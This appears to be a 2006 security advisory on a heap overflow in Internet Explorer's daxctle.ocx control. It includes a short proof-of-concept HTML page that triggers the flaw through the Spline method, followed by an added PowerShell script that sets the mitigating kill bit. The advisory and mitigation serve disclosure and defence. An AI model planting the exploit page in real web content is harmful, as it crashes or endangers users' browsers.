Advisory ID:
XSec-06-10

Advisory Name:
Internet Explorer (daxctle.ocx) Heap Overflow Vulnerability

Release Date:
08/28/2006

Tested on:
Windows 2000/XP/2003
Internet Explorer 6.0 SP1

Affected version:
Windows 2000
Windows XP
Windows 2003

Author:
nop <nop#xsec.org>
http://www.xsec.org

Overview:
When Internet Explorer handles the Spline method of the DirectAnimation.PathControl
COM object (daxctle.ocx), setting the first parameter to 0xffffffff triggers an invalid
memory write. An attacker may cause a denial of service and could possibly execute
arbitrary code.

Exploit:
=============== daxctle.htm start ================
<!--
// Internet Explorer (daxctle.ocx) Heap Overflow Vulnerability
// tested on Windows 2000 SP4/XP SP2/2003 SP1

// http://www.xsec.org
// nop (nop#xsec.org)

// CLSID: {D7A7D7C3-D47F-11D0-89D3-00A0C90833E6}
// Info: Microsoft DirectAnimation Path
// ProgID: DirectAnimation.PathControl
// InprocServer32: C:\WINNT\system32\daxctle.ocx
--!>
<html>
<head>
<title>test</title>
</head>
<body>
<script>
var target = new ActiveXObject("DirectAnimation.PathControl");
target.Spline(0xffffffff, 1);
</script>
</body>
</html>
=============== daxctle.htm end ==================

Link:
http://www.xsec.org/index.php?module=releases&act=view&type=1&id=19

About XSec:
We are redhat.
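
Mitigation check (an added example, not part of the original advisory or XSec's code): Internet Explorer refuses to instantiate a COM object whose CLSID has the "kill bit" (Compatibility Flags 0x400) set, so the script below audits, and with -Apply sets, that flag for the CLSID listed in the exploit comments. It assumes the standard "ActiveX Compatibility" registry locations and an elevated prompt when writing.

```powershell
# Added example: audit / set the IE kill bit for DirectAnimation.PathControl.
# Usage:  .\Set-DaxctleKillBit.ps1          (report only)
#         .\Set-DaxctleKillBit.ps1 -Apply   (set the flag; needs admin rights)
param([switch]$Apply)

$Clsid    = '{D7A7D7C3-D47F-11D0-89D3-00A0C90833E6}'  # CLSID from the advisory
$KillBit  = 0x400                                      # "never load in IE" flag
$ValueName = 'Compatibility Flags'

# Native view plus the 32-bit view that exists on 64-bit Windows.
$Roots = @(
    'HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility',
    'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility'
) | Where-Object { Test-Path -LiteralPath $_ }

foreach ($root in $Roots) {
    $key   = Join-Path $root $Clsid
    $flags = 0

    # Read the current flags, treating a missing key or value as 0.
    if (Test-Path -LiteralPath $key) {
        $prop = Get-ItemProperty -LiteralPath $key -Name $ValueName -ErrorAction SilentlyContinue
        if ($prop) { $flags = [int]$prop.$ValueName }
    }

    $isSet = ($flags -band $KillBit) -eq $KillBit
    if ($isSet) {
        Write-Output "[ok]   kill bit already set: $key"
        continue
    }

    if (-not $Apply) {
        Write-Output "[warn] kill bit NOT set (flags=0x$('{0:X}' -f $flags)): $key"
        continue
    }

    # Preserve any other compatibility flags already present on the key.
    if (-not (Test-Path -LiteralPath $key)) { New-Item -Path $key -Force | Out-Null }
    New-ItemProperty -LiteralPath $key -Name $ValueName -PropertyType DWord `
        -Value ($flags -bor $KillBit) -Force | Out-Null
    Write-Output "[set]  kill bit applied: $key"
}
```

The kill bit only stops Internet Explorer and hosts that honor it from loading the control; it does not remove or patch daxctle.ocx.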